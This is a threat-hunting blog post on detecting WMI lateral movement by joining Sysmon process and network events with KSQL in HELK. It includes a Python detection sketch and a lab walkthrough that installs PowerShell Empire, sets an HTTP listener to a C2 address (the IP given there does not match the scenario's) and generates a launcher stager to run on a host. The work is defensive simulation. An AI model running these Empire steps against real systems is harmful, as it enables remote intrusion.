
Real-Time Sysmon Processing via KSQL and HELK―Part 3: Basic Use Case

[Category: Systems (Windows) | Publisher: 店小二05 | Time: 2019 | Author: 红领巾]


In the previous post, I shared a Sysmon-Join KSQL recipe to join events 1 and 3 in real time, push the results to an Elasticsearch index, and interact with it via its Kibana web interface and index pattern. In this post, I will show you how all this can be helpful while hunting for certain lateral movement events.

This post is part of a three-part series. The other two parts can be found in the following links:

Real-Time Sysmon Processing via KSQL and HELK ― Part 1: Initial Integration
Real-Time Sysmon Processing via KSQL and HELK ― Part 2: Sysmon-Join KSQL Recipe

Basic Lateral Movement Thoughts

When talking about lateral movement, I initially think about authenticated remote code execution using legitimate credentials from a source system to a target system, for the following basic scenarios:

Gather information directly from the endpoint.
Move or copy a resource over the network.
Create a new process to launch a new agent on the target system.

From the basic scenarios shown above, the one that I like to explore the most is the last one (a new agent spawned on a target system). This is because I find it very interesting to track authenticated remote code execution that creates a process followed by a network connection to an external entity. Now, this might be common in your environment, I know. There are several applications that might do just that. However, there are certain legitimate built-in features in Windows systems that are commonly used by attackers for remote code execution and that may be less common in your environment than you would expect. This is the case of Windows Management Instrumentation (WMI), which can be used to create a new process on a remote system that could subsequently make a network connection to an external resource.

What is WMI?

WMI is the Microsoft implementation of the Web-Based Enterprise Management (WBEM) and Common Information Model (CIM). Both standards aim to provide an industry-agnostic means of collecting and transmitting information related to any managed component in an enterprise. An example of a managed component in WMI would be a running process, registry key, installed service, file information, etc. At a high level, Microsoft’s implementation of these standards can be summarized as follows:

Managed Components

Managed components are represented as WMI objects ― class instances representing highly structured operating system data.

Microsoft provides a wealth of WMI objects that communicate information related to the operating system. E.g. Win32_Process, Win32_Service, AntiVirusProduct, Win32_StartupCommand, etc.

Lateral Movement via WMI

One well-known lateral movement technique uses the WMI class Win32_Process and its Create method, because Create allows a user to create a process either locally or remotely. One thing to notice is that when the Create method is used on a remote system, the method runs under a host process named “Wmiprvse.exe”. The process Wmiprvse.exe is what spawns the process defined in the CommandLine parameter of the Create method. Therefore, a new process created remotely this way will have Wmiprvse.exe as its parent.

How does KSQL help?

The basic behavior that we are looking for is a process spawning a new process that makes an external network connection. In the last post, we were able to join Sysmon event 1 (ProcessCreate) and Sysmon event 3 (NetworkConnect) in real time. The result gives us context not only about the process making an external network connection, but also about the parent process that initially created the process calling out to the Internet. This is very helpful for our basic detection use case.
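As an added illustration of the detection logic from the two sections above (this is not code from the original post or from HELK), the following Python runs the parent-is-Wmiprvse.exe plus external-destination check over a few constructed joined Sysmon records. Field names are assumed to mirror Sysmon's own, and the extra_external parameter covers the lab case where, as in this post, the C2 sits on an internal address.

```python
import ipaddress
from typing import Dict, Iterable, List

# Constructed sample of joined Sysmon records (event 1 ProcessCreate joined with
# event 3 NetworkConnect), shaped like the SYSMON_JOIN stream from the previous
# post. Field names reuse Sysmon's own (ParentImage, Image, DestinationIp); the
# exact column names of the KSQL stream are an assumption.
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_JOINED: List[Dict[str, str]] = [
    # lab C2 from the post sits on an internal address
    {"ProcessGuid": "{A1}", "ParentImage": WMIPRVSE, "Image": POWERSHELL,
     "DestinationIp": "192.168.64.84"},
    # constructed public destination: the realistic case
    {"ProcessGuid": "{A2}", "ParentImage": WMIPRVSE, "Image": POWERSHELL,
     "DestinationIp": "93.184.216.34"},
    # ordinary browsing: public destination but the parent is not WmiPrvSE.exe
    {"ProcessGuid": "{A3}", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Browser\browser.exe", "DestinationIp": "93.184.216.34"},
    # WMI-spawned, but only talks to loopback
    {"ProcessGuid": "{A4}", "ParentImage": WMIPRVSE, "Image": POWERSHELL,
     "DestinationIp": "127.0.0.1"},
]


def is_external(ip: str, extra_external: Iterable[str] = ()) -> bool:
    """Globally routable destination, or one explicitly listed as external
    (lets the post's internal lab C2 192.168.64.84 count as 'external')."""
    return ip in set(extra_external) or ipaddress.ip_address(ip).is_global


def wmi_spawn_callout(rec: Dict[str, str], extra_external: Iterable[str] = ()) -> bool:
    """Parent is WmiPrvSE.exe (the host process for remote Win32_Process.Create)
    and the child reaches an external destination."""
    if not rec.get("ParentImage", "").lower().endswith("\\wmiprvse.exe"):
        return False
    return is_external(rec.get("DestinationIp", "0.0.0.0"), extra_external)


def hunt(records: Iterable[Dict[str, str]], extra_external: Iterable[str] = ()) -> List[str]:
    """ProcessGuids of joined records matching the WMI lateral movement pattern."""
    return [r["ProcessGuid"] for r in records if wmi_spawn_callout(r, extra_external)]


if __name__ == "__main__":
    print(hunt(SAMPLE_JOINED))                                    # ['{A2}']
    print(hunt(SAMPLE_JOINED, extra_external=["192.168.64.84"]))  # ['{A1}', '{A2}']
```

The same predicate maps directly onto a WHERE clause over the SYSMON_JOIN stream once you know its column names.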

Empire: lateral_movement/invoke_wmi Module

For this post, we will use the invoke_wmi module from the Empire Project to simulate a suspicious lateral movement via WMI. This module executes a stager on a target system in order to communicate with the attacker’s C2 and handle the staging protocol.

Use Case Scenario

Adversary compromises a domain system with IP address 192.168.64.178
Adversary has rights to access another domain system named DESKTOP-LFD11QP with IP address 192.168.64.137
Adversary’s C2 IP address is 192.168.64.84 (I was running everything on my own laptop, so the C2 has an internal IP address. In a more realistic scenario, the C2 IP would be an external IP address)
Adversary decides to move laterally from 192.168.64.178 to 192.168.64.137 via WMI, spawning a new agent on the target system

Requirements:

Two Windows systems (target system running Sysmon)
PowerShell Empire server (invoke_wmi module)
Ubuntu box hosting the latest HELK build running the Sysmon-Join KSQL recipe

Monitor for New Messages

Monitor for any new messages matching the statements defined in our Sysmon-Join KSQL recipe and being published to the SYSMON_JOIN stream/topic. You can use the KSQL command PRINT as shown below:

PRINT SYSMON_JOIN;

Initiate Empire

git clone https://github.com/EmpireProject/Empire.git
cd Empire
sudo ./setup/install.sh
./empire

Set up Listener

listeners
uselistener http
set Host http://192.168.64.184:80
execute
Use Stager

usestager multi/launcher
set Listener http
execute

Copy the PowerShell command returned. Run the PowerShell command on your source system (192.168.64.178). You will get an initial agent active in your Empire server.

